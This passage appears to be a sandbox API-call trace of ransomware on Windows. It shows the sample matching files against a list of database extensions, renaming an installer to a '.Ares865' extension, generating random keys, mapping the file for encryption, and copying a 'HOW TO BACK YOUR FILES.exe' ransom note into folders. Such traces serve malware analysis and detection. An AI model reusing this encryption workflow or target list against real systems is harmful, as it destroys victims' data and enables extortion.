(lpString="sqlitedb") returned 8 [0075.322] lstrcmpiW (lpString1="_x86.msi", lpString2="sqlitedb") returned -1 [0075.322] lstrlenW (lpString="xml") returned 3 [0075.322] lstrcmpiW (lpString1="msi", lpString2="xml") returned -1 [0075.322] lstrlenW (lpString="$er") returned 3 [0075.322] lstrcmpiW (lpString1="msi", lpString2="$er") returned 1 [0075.322] lstrlenW (lpString="4dd") returned 3 [0075.322] lstrcmpiW (lpString1="msi", lpString2="4dd") returned 1 [0075.322] lstrlenW (lpString="4dl") returned 3 [0075.322] lstrcmpiW (lpString1="msi", lpString2="4dl") returned 1 [0075.322] lstrlenW (lpString="^^^") returned 3 [0075.322] lstrcmpiW (lpString1="msi", lpString2="^^^") returned 1 [0075.322] lstrlenW (lpString="abs") returned 3 [0075.322] lstrcmpiW (lpString1="msi", lpString2="abs") returned 1 [0075.322] lstrlenW (lpString="abx") returned 3 [0075.322] lstrcmpiW (lpString1="msi", lpString2="abx") returned 1 [0075.322] lstrlenW (lpString="accdb") returned 5 [0075.322] lstrcmpiW (lpString1="6.msi", lpString2="accdb") returned -1 [0075.322] lstrlenW (lpString="accdc") returned 5 [0075.322] lstrcmpiW (lpString1="6.msi", lpString2="accdc") returned -1 [0075.322] lstrlenW (lpString="accde") returned 5 [0075.322] lstrcmpiW (lpString1="6.msi", lpString2="accde") returned -1 [0075.322] lstrlenW (lpString="accdr") returned 5 [0075.322] lstrcmpiW (lpString1="6.msi", lpString2="accdr") returned -1 [0075.322] lstrlenW (lpString="accdt") returned 5 [0075.322] lstrcmpiW (lpString1="6.msi", lpString2="accdt") returned -1 [0075.322] lstrlenW (lpString="accdw") returned 5 [0075.322] lstrcmpiW (lpString1="6.msi", lpString2="accdw") returned -1 [0075.322] lstrlenW (lpString="accft") returned 5 [0075.322] lstrcmpiW (lpString1="6.msi", lpString2="accft") returned -1 [0075.322] lstrlenW (lpString="adb") returned 3 [0075.322] lstrcmpiW (lpString1="msi", lpString2="adb") returned 1 [0075.322] lstrlenW (lpString="adb") returned 3 [0075.322] lstrcmpiW (lpString1="msi", lpString2="adb") returned 1 [0075.322] lstrlenW (lpString="ade") returned 3 [0075.322] lstrcmpiW (lpString1="msi", lpString2="ade") returned 1 [0075.322] lstrlenW (lpString="adf") returned 3 [0075.322] lstrcmpiW (lpString1="msi", lpString2="adf") returned 1 [0075.322] lstrlenW (lpString="adn") returned 3 [0075.323] lstrcmpiW (lpString1="msi", lpString2="adn") returned 1 [0075.323] lstrlenW (lpString="adp") returned 3 [0075.323] lstrcmpiW (lpString1="msi", lpString2="adp") returned 1 [0075.323] lstrlenW (lpString="alf") returned 3 [0075.323] lstrcmpiW (lpString1="msi", lpString2="alf") returned 1 [0075.323] lstrlenW (lpString="ask") returned 3 [0075.323] lstrcmpiW (lpString1="msi", lpString2="ask") returned 1 [0075.323] lstrlenW (lpString="btr") returned 3 [0075.323] lstrcmpiW (lpString1="msi", lpString2="btr") returned 1 [0075.323] lstrlenW (lpString="cat") returned 3 [0075.323] lstrcmpiW (lpString1="msi", lpString2="cat") returned 1 [0075.323] lstrlenW (lpString="cdb") returned 3 [0075.323] lstrcmpiW (lpString1="msi", lpString2="cdb") returned 1 [0075.323] lstrlenW (lpString="ckp") returned 3 [0075.323] lstrcmpiW (lpString1="msi", lpString2="ckp") returned 1 [0075.323] lstrlenW (lpString="cma") returned 3 [0075.323] lstrcmpiW (lpString1="msi", lpString2="cma") returned 1 [0075.323] lstrlenW (lpString="cpd") returned 3 [0075.323] lstrcmpiW (lpString1="msi", lpString2="cpd") returned 1 [0075.323] lstrlenW (lpString="dacpac") returned 6 [0075.323] lstrcmpiW (lpString1="86.msi", lpString2="dacpac") returned -1 [0075.323] lstrlenW (lpString="dad") returned 3 [0075.323] lstrcmpiW (lpString1="msi", lpString2="dad") returned 1 [0075.323] lstrlenW (lpString="dadiagrams") returned 10 [0075.323] lstrcmpiW (lpString1="al_x86.msi", lpString2="dadiagrams") returned -1 [0075.323] lstrlenW (lpString="daschema") returned 8 [0075.323] lstrcmpiW (lpString1="_x86.msi", lpString2="daschema") returned -1 [0075.323] lstrlenW (lpString="db-journal") returned 10 [0075.323] lstrcmpiW (lpString1="al_x86.msi", lpString2="db-journal") returned -1 [0075.323] lstrlenW (lpString="db-shm") returned 6 [0075.323] lstrcmpiW (lpString1="86.msi", lpString2="db-shm") returned -1 [0075.323] lstrlenW (lpString="db-wal") returned 6 [0075.323] lstrcmpiW (lpString1="86.msi", lpString2="db-wal") returned -1 [0075.323] lstrlenW (lpString="dbc") returned 3 [0075.323] lstrcmpiW (lpString1="msi", lpString2="dbc") returned 1 [0075.323] lstrlenW (lpString="dbs") returned 3 [0075.323] lstrcmpiW (lpString1="msi", lpString2="dbs") returned 1 [0075.324] lstrlenW (lpString="dbt") returned 3 [0075.324] lstrcmpiW (lpString1="msi", lpString2="dbt") returned 1 [0075.324] lstrlenW (lpString="dbv") returned 3 [0075.324] lstrcmpiW (lpString1="msi", lpString2="dbv") returned 1 [0075.324] lstrlenW (lpString="dbx") returned 3 [0075.324] lstrcmpiW (lpString1="msi", lpString2="dbx") returned 1 [0075.324] lstrlenW (lpString="dcb") returned 3 [0075.324] lstrcmpiW (lpString1="msi", lpString2="dcb") returned 1 [0075.324] lstrlenW (lpString="dct") returned 3 [0075.324] lstrcmpiW (lpString1="msi", lpString2="dct") returned 1 [0075.324] lstrlenW (lpString="dcx") returned 3 [0075.324] lstrcmpiW (lpString1="msi", lpString2="dcx") returned 1 [0075.324] lstrlenW (lpString="ddl") returned 3 [0075.324] lstrcmpiW (lpString1="msi", lpString2="ddl") returned 1 [0075.324] lstrlenW (lpString="dlis") returned 4 [0075.324] lstrcmpiW (lpString1=".msi", lpString2="dlis") returned -1 [0075.324] lstrlenW (lpString="dp1") returned 3 [0075.324] lstrcmpiW (lpString1="msi", lpString2="dp1") returned 1 [0075.324] lstrlenW (lpString="dqy") returned 3 [0075.324] lstrcmpiW (lpString1="msi", lpString2="dqy") returned 1 [0075.324] lstrlenW (lpString="dsk") returned 3 [0075.324] lstrcmpiW (lpString1="msi", lpString2="dsk") returned 1 [0075.324] lstrlenW (lpString="dsn") returned 3 [0075.324] lstrcmpiW (lpString1="msi", lpString2="dsn") returned 1 [0075.324] lstrlenW (lpString="dtsx") returned 4 [0075.324] lstrcmpiW (lpString1=".msi", lpString2="dtsx") returned -1 [0075.324] lstrlenW (lpString="dxl") returned 3 [0075.324] lstrcmpiW (lpString1="msi", lpString2="dxl") returned 1 [0075.324] lstrlenW (lpString="eco") returned 3 [0075.324] lstrcmpiW (lpString1="msi", lpString2="eco") returned 1 [0075.324] lstrlenW (lpString="ecx") returned 3 [0075.324] lstrcmpiW (lpString1="msi", lpString2="ecx") returned 1 [0075.324] lstrlenW (lpString="edb") returned 3 [0075.324] lstrcmpiW (lpString1="msi", lpString2="edb") returned 1 [0075.324] lstrlenW (lpString="epim") returned 4 [0075.324] lstrcmpiW (lpString1=".msi", lpString2="epim") returned -1 [0075.324] lstrlenW (lpString="fcd") returned 3 [0075.325] lstrcmpiW (lpString1="msi", lpString2="fcd") returned 1 [0075.325] lstrlenW (lpString="fdb") returned 3 [0075.325] lstrcmpiW (lpString1="msi", lpString2="fdb") returned 1 [0075.325] lstrlenW (lpString="fic") returned 3 [0075.325] lstrcmpiW (lpString1="msi", lpString2="fic") returned 1 [0075.325] lstrlenW (lpString="flexolibrary") returned 12 [0075.325] lstrcmpiW (lpString1="onal_x86.msi", lpString2="flexolibrary") returned 1 [0075.325] lstrlenW (lpString="fm5") returned 3 [0075.325] lstrcmpiW (lpString1="msi", lpString2="fm5") returned 1 [0075.325] lstrlenW (lpString="fmp") returned 3 [0075.325] lstrcmpiW (lpString1="msi", lpString2="fmp") returned 1 [0075.325] lstrlenW (lpString="fmp12") returned 5 [0075.325] lstrcmpiW (lpString1="6.msi", lpString2="fmp12") returned -1 [0075.325] lstrlenW (lpString="fmpsl") returned 5 [0075.325] lstrcmpiW (lpString1="6.msi", lpString2="fmpsl") returned -1 [0075.325] lstrlenW (lpString="fol") returned 3 [0075.325] lstrcmpiW (lpString1="msi", lpString2="fol") returned 1 [0075.325] lstrlenW (lpString="fp3") returned 3 [0075.325] lstrcmpiW (lpString1="msi", lpString2="fp3") returned 1 [0075.325] lstrlenW (lpString="fp4") returned 3 [0075.325] lstrcmpiW (lpString1="msi", lpString2="fp4") returned 1 [0075.325] lstrlenW (lpString="fp5") returned 3 [0075.325] lstrcmpiW (lpString1="msi", lpString2="fp5") returned 1 [0075.325] lstrlenW (lpString="fp7") returned 3 [0075.325] lstrcmpiW (lpString1="msi", lpString2="fp7") returned 1 [0075.325] lstrlenW (lpString="fpt") returned 3 [0075.325] lstrcmpiW (lpString1="msi", lpString2="fpt") returned 1 [0075.325] lstrlenW (lpString="frm") returned 3 [0075.325] lstrcmpiW (lpString1="msi", lpString2="frm") returned 1 [0075.325] lstrlenW (lpString="gdb") returned 3 [0075.325] lstrcmpiW (lpString1="msi", lpString2="gdb") returned 1 [0075.325] lstrlenW (lpString="gdb") returned 3 [0075.325] lstrcmpiW (lpString1="msi", lpString2="gdb") returned 1 [0075.325] lstrlenW (lpString="grdb") returned 4 [0075.325] lstrcmpiW (lpString1=".msi", lpString2="grdb") returned -1 [0075.325] lstrlenW (lpString="gwi") returned 3 [0075.325] lstrcmpiW (lpString1="msi", lpString2="gwi") returned 1 [0075.326] lstrlenW (lpString="hdb") returned 3 [0075.326] lstrcmpiW (lpString1="msi", lpString2="hdb") returned 1 [0075.326] lstrlenW (lpString="his") returned 3 [0075.326] lstrcmpiW (lpString1="msi", lpString2="his") returned 1 [0075.326] lstrlenW (lpString="ib") returned 2 [0075.326] lstrcmpiW (lpString1="si", lpString2="ib") returned 1 [0075.326] lstrlenW (lpString="idb") returned 3 [0075.326] lstrcmpiW (lpString1="msi", lpString2="idb") returned 1 [0075.326] lstrlenW (lpString="ihx") returned 3 [0075.326] lstrcmpiW (lpString1="msi", lpString2="ihx") returned 1 [0075.326] lstrlenW (lpString="itdb") returned 4 [0075.326] lstrcmpiW (lpString1=".msi", lpString2="itdb") returned -1 [0075.326] lstrlenW (lpString="itw") returned 3 [0075.326] lstrcmpiW (lpString1="msi", lpString2="itw") returned 1 [0075.326] lstrlenW (lpString="jet") returned 3 [0075.326] lstrcmpiW (lpString1="msi", lpString2="jet") returned 1 [0075.326] lstrlenW (lpString="jtx") returned 3 [0075.326] lstrcmpiW (lpString1="msi", lpString2="jtx") returned 1 [0075.326] lstrlenW (lpString="kdb") returned 3 [0075.326] lstrcmpiW (lpString1="msi", lpString2="kdb") returned 1 [0075.326] lstrlenW (lpString="kexi") returned 4 [0075.326] lstrcmpiW (lpString1=".msi", lpString2="kexi") returned -1 [0075.326] lstrlenW (lpString="kexic") returned 5 [0075.326] lstrcmpiW (lpString1="6.msi", lpString2="kexic") returned -1 [0075.326] lstrlenW (lpString="kexis") returned 5 [0075.326] lstrcmpiW (lpString1="6.msi", lpString2="kexis") returned -1 [0075.326] lstrlenW (lpString="lgc") returned 3 [0075.326] lstrcmpiW (lpString1="msi", lpString2="lgc") returned 1 [0075.326] lstrlenW (lpString="lwx") returned 3 [0075.326] lstrcmpiW (lpString1="msi", lpString2="lwx") returned 1 [0075.339] lstrlenW (lpString="maf") returned 3 [0075.339] lstrcmpiW (lpString1="msi", lpString2="maf") returned 1 [0075.339] lstrlenW (lpString="maq") returned 3 [0075.339] lstrcmpiW (lpString1="msi", lpString2="maq") returned 1 [0075.339] lstrlenW (lpString="mar") returned 3 [0075.339] lstrcmpiW (lpString1="msi", lpString2="mar") returned 1 [0075.339] lstrlenW (lpString="marshal") returned 7 [0075.340] lstrcmpiW (lpString1="x86.msi", lpString2="marshal") returned 1 [0075.340] lstrlenW (lpString="mas") returned 3 [0075.340] lstrcmpiW (lpString1="msi", lpString2="mas") returned 1 [0075.340] lstrlenW (lpString="mav") returned 3 [0075.340] lstrcmpiW (lpString1="msi", lpString2="mav") returned 1 [0075.340] lstrlenW (lpString="maw") returned 3 [0075.340] lstrcmpiW (lpString1="msi", lpString2="maw") returned 1 [0075.340] lstrlenW (lpString="mdbhtml") returned 7 [0075.340] lstrcmpiW (lpString1="x86.msi", lpString2="mdbhtml") returned 1 [0075.340] lstrlenW (lpString="mdn") returned 3 [0075.340] lstrcmpiW (lpString1="msi", lpString2="mdn") returned 1 [0075.340] lstrlenW (lpString="mdt") returned 3 [0075.340] lstrcmpiW (lpString1="msi", lpString2="mdt") returned 1 [0075.340] lstrlenW (lpString="mfd") returned 3 [0075.340] lstrcmpiW (lpString1="msi", lpString2="mfd") returned 1 [0075.340] lstrlenW (lpString="mpd") returned 3 [0075.340] lstrcmpiW (lpString1="msi", lpString2="mpd") returned 1 [0075.340] lstrlenW (lpString="mrg") returned 3 [0075.340] lstrcmpiW (lpString1="msi", lpString2="mrg") returned 1 [0075.340] lstrlenW (lpString="mud") returned 3 [0075.340] lstrcmpiW (lpString1="msi", lpString2="mud") returned -1 [0075.340] lstrlenW (lpString="mwb") returned 3 [0075.340] lstrcmpiW (lpString1="msi", lpString2="mwb") returned -1 [0075.340] lstrlenW (lpString="myd") returned 3 [0075.340] lstrcmpiW (lpString1="msi", lpString2="myd") returned -1 [0075.340] lstrlenW (lpString="ndf") returned 3 [0075.340] lstrcmpiW (lpString1="msi", lpString2="ndf") returned -1 [0075.340] lstrlenW (lpString="nnt") returned 3 [0075.340] lstrcmpiW (lpString1="msi", lpString2="nnt") returned -1 [0075.340] lstrlenW (lpString="nrmlib") returned 6 [0075.340] lstrcmpiW (lpString1="86.msi", lpString2="nrmlib") returned -1 [0075.340] lstrlenW (lpString="ns2") returned 3 [0075.340] lstrcmpiW (lpString1="msi", lpString2="ns2") returned -1 [0075.340] lstrlenW (lpString="ns3") returned 3 [0075.340] lstrcmpiW (lpString1="msi", lpString2="ns3") returned -1 [0075.340] lstrlenW (lpString="ns4") returned 3 [0075.340] lstrcmpiW (lpString1="msi", lpString2="ns4") returned -1 [0075.340] lstrlenW (lpString="nsf") returned 3 [0075.341] lstrcmpiW (lpString1="msi", lpString2="nsf") returned -1 [0075.341] lstrlenW (lpString="nv") returned 2 [0075.341] lstrcmpiW (lpString1="si", lpString2="nv") returned 1 [0075.341] lstrlenW (lpString="nv2") returned 3 [0075.341] lstrcmpiW (lpString1="msi", lpString2="nv2") returned -1 [0075.341] lstrlenW (lpString="nwdb") returned 4 [0075.341] lstrcmpiW (lpString1=".msi", lpString2="nwdb") returned -1 [0075.341] lstrlenW (lpString="nyf") returned 3 [0075.341] lstrcmpiW (lpString1="msi", lpString2="nyf") returned -1 [0075.341] lstrlenW (lpString="odb") returned 3 [0075.341] lstrcmpiW (lpString1="msi", lpString2="odb") returned -1 [0075.341] lstrlenW (lpString="odb") returned 3 [0075.341] lstrcmpiW (lpString1="msi", lpString2="odb") returned -1 [0075.341] lstrlenW (lpString="oqy") returned 3 [0075.341] lstrcmpiW (lpString1="msi", lpString2="oqy") returned -1 [0075.341] lstrlenW (lpString="ora") returned 3 [0075.341] lstrcmpiW (lpString1="msi", lpString2="ora") returned -1 [0075.341] lstrlenW (lpString="orx") returned 3 [0075.341] lstrcmpiW (lpString1="msi", lpString2="orx") returned -1 [0075.341] lstrlenW (lpString="owc") returned 3 [0075.341] lstrcmpiW (lpString1="msi", lpString2="owc") returned -1 [0075.341] lstrlenW (lpString="p96") returned 3 [0075.341] lstrcmpiW (lpString1="msi", lpString2="p96") returned -1 [0075.341] lstrlenW (lpString="p97") returned 3 [0075.341] lstrcmpiW (lpString1="msi", lpString2="p97") returned -1 [0075.341] lstrlenW (lpString="pan") returned 3 [0075.341] lstrcmpiW (lpString1="msi", lpString2="pan") returned -1 [0075.341] lstrlenW (lpString="pdb") returned 3 [0075.341] lstrcmpiW (lpString1="msi", lpString2="pdb") returned -1 [0075.341] lstrlenW (lpString="pdm") returned 3 [0075.341] lstrcmpiW (lpString1="msi", lpString2="pdm") returned -1 [0075.341] lstrlenW (lpString="pnz") returned 3 [0075.341] lstrcmpiW (lpString1="msi", lpString2="pnz") returned -1 [0075.341] lstrlenW (lpString="qry") returned 3 [0075.341] lstrcmpiW (lpString1="msi", lpString2="qry") returned -1 [0075.341] lstrlenW (lpString="qvd") returned 3 [0075.341] lstrcmpiW (lpString1="msi", lpString2="qvd") returned -1 [0075.341] lstrlenW (lpString="rbf") returned 3 [0075.342] lstrcmpiW (lpString1="msi", lpString2="rbf") returned -1 [0075.342] lstrlenW (lpString="rctd") returned 4 [0075.342] lstrcmpiW (lpString1=".msi", lpString2="rctd") returned -1 [0075.342] lstrlenW (lpString="rod") returned 3 [0075.342] lstrcmpiW (lpString1="msi", lpString2="rod") returned -1 [0075.342] lstrlenW (lpString="rodx") returned 4 [0075.342] lstrcmpiW (lpString1=".msi", lpString2="rodx") returned -1 [0075.342] lstrlenW (lpString="rpd") returned 3 [0075.342] lstrcmpiW (lpString1="msi", lpString2="rpd") returned -1 [0075.342] lstrlenW (lpString="rsd") returned 3 [0075.342] lstrcmpiW (lpString1="msi", lpString2="rsd") returned -1 [0075.342] lstrlenW (lpString="sas7bdat") returned 8 [0075.342] lstrcmpiW (lpString1="_x86.msi", lpString2="sas7bdat") returned -1 [0075.342] lstrlenW (lpString="sbf") returned 3 [0075.349] lstrcmpiW (lpString1="msi", lpString2="sbf") returned -1 [0075.349] lstrlenW (lpString="scx") returned 3 [0075.349] lstrcmpiW (lpString1="msi", lpString2="scx") returned -1 [0075.349] lstrlenW (lpString="sdb") returned 3 [0075.349] lstrcmpiW (lpString1="msi", lpString2="sdb") returned -1 [0075.349] lstrlenW (lpString="sdc") returned 3 [0075.349] lstrcmpiW (lpString1="msi", lpString2="sdc") returned -1 [0075.349] lstrlenW (lpString="sdf") returned 3 [0075.349] lstrcmpiW (lpString1="msi", lpString2="sdf") returned -1 [0075.349] lstrlenW (lpString="sis") returned 3 [0075.349] lstrcmpiW (lpString1="msi", lpString2="sis") returned -1 [0075.349] lstrlenW (lpString="spq") returned 3 [0075.349] lstrcmpiW (lpString1="msi", lpString2="spq") returned -1 [0075.349] lstrlenW (lpString="te") returned 2 [0075.349] lstrcmpiW (lpString1="si", lpString2="te") returned -1 [0075.349] lstrlenW (lpString="teacher") returned 7 [0075.349] lstrcmpiW (lpString1="x86.msi", lpString2="teacher") returned 1 [0075.349] lstrlenW (lpString="tmd") returned 3 [0075.349] lstrcmpiW (lpString1="msi", lpString2="tmd") returned -1 [0075.349] lstrlenW (lpString="tps") returned 3 [0075.349] lstrcmpiW (lpString1="msi", lpString2="tps") returned -1 [0075.349] lstrlenW (lpString="trc") returned 3 [0075.349] lstrcmpiW (lpString1="msi", lpString2="trc") returned -1 [0075.349] lstrlenW (lpString="trc") returned 3 [0075.349] lstrcmpiW (lpString1="msi", lpString2="trc") returned -1 [0075.349] lstrlenW (lpString="trm") returned 3 [0075.349] lstrcmpiW (lpString1="msi", lpString2="trm") returned -1 [0075.349] lstrlenW (lpString="udb") returned 3 [0075.349] lstrcmpiW (lpString1="msi", lpString2="udb") returned -1 [0075.349] lstrlenW (lpString="udl") returned 3 [0075.349] lstrcmpiW (lpString1="msi", lpString2="udl") returned -1 [0075.350] lstrlenW (lpString="usr") returned 3 [0075.350] lstrcmpiW (lpString1="msi", lpString2="usr") returned -1 [0075.350] lstrlenW (lpString="v12") returned 3 [0075.350] lstrcmpiW (lpString1="msi", lpString2="v12") returned -1 [0075.350] lstrlenW (lpString="vis") returned 3 [0075.350] lstrcmpiW (lpString1="msi", lpString2="vis") returned -1 [0075.350] lstrlenW (lpString="vpd") returned 3 [0075.350] lstrcmpiW (lpString1="msi", lpString2="vpd") returned -1 [0075.350] lstrlenW (lpString="vvv") returned 3 [0075.350] lstrcmpiW (lpString1="msi", lpString2="vvv") returned -1 [0075.350] lstrlenW (lpString="wdb") returned 3 [0075.350] lstrcmpiW (lpString1="msi", lpString2="wdb") returned -1 [0075.350] lstrlenW (lpString="wmdb") returned 4 [0075.350] lstrcmpiW (lpString1=".msi", lpString2="wmdb") returned -1 [0075.350] lstrlenW (lpString="wrk") returned 3 [0075.350] lstrcmpiW (lpString1="msi", lpString2="wrk") returned -1 [0075.350] lstrlenW (lpString="xdb") returned 3 [0075.350] lstrcmpiW (lpString1="msi", lpString2="xdb") returned -1 [0075.350] lstrlenW (lpString="xld") returned 3 [0075.350] lstrcmpiW (lpString1="msi", lpString2="xld") returned -1 [0075.350] lstrlenW (lpString="xmlff") returned 5 [0075.350] lstrcmpiW (lpString1="6.msi", lpString2="xmlff") returned -1 [0075.350] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.Ares865") returned 152 [0075.350] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.Ares865" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.ares865"), dwFlags=0x1) returned 1 [0075.351] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.Ares865" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0075.351] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=151552) returned 1 [0075.351] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0075.352] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0075.352] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f07c0 [0075.352] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2effc8) returned 1 [0075.353] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0075.353] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0075.353] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x25300, lpName=0x0) returned 0x120 [0075.356] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x25300) returned 0x420000 [0075.427] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0408) returned 1 [0075.428] CryptGenRandom (in: hProv=0x2f0408, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0075.428] CryptReleaseContext (hProv=0x2f0408, dwFlags=0x0) returned 1 [0075.428] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d32b0 [0075.428] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d32b0 | out: hHeap=0x2b0000) returned 1 [0075.428] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0075.428] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0075.428] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0075.428] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0075.428] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9fb0 [0075.429] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0075.429] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9fb0 | out: hHeap=0x2b0000) returned 1 [0075.429] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0075.429] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0075.430] CloseHandle (hObject=0x120) returned 1 [0075.430] CloseHandle (hObject=0x164) returned 1 [0075.430] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0075.430] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f07c0 | out: hHeap=0x2b0000) returned 1 [0075.430] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0075.431] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48395900, ftCreationTime.dwHighDateTime=0x1ced4da, ftLastAccessTime.dwLowDateTime=0x48395900, ftLastAccessTime.dwHighDateTime=0x1ced4da, ftLastWriteTime.dwLowDateTime=0x48395900, ftLastWriteTime.dwHighDateTime=0x1ced4da, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vc_runtimeAdditional_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 0 [0075.431] FindClose (in: hFindFile=0x2cd0e8 | out: hFindFile=0x2cd0e8) returned 1 [0075.431] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d25c8 [0075.431] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005") returned="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005" [0075.431] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2b30 | out: hHeap=0x2b0000) returned 1 [0075.431] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d25c0 | out: hHeap=0x2b0000) returned 1 [0075.431] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005") returned 82 [0075.431] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005" | out: lpString1="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005") returned="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005" [0075.431] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.431] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\how to back your files.exe"), bFailIfExists=1) returned 0 [0075.432] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0075.432] GetLastError () returned 0x20 [0075.432] Sleep (dwMilliseconds=0xc8) [0075.623] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0075.652] GetLastError () returned 0x0 [0075.652] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0075.652] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, 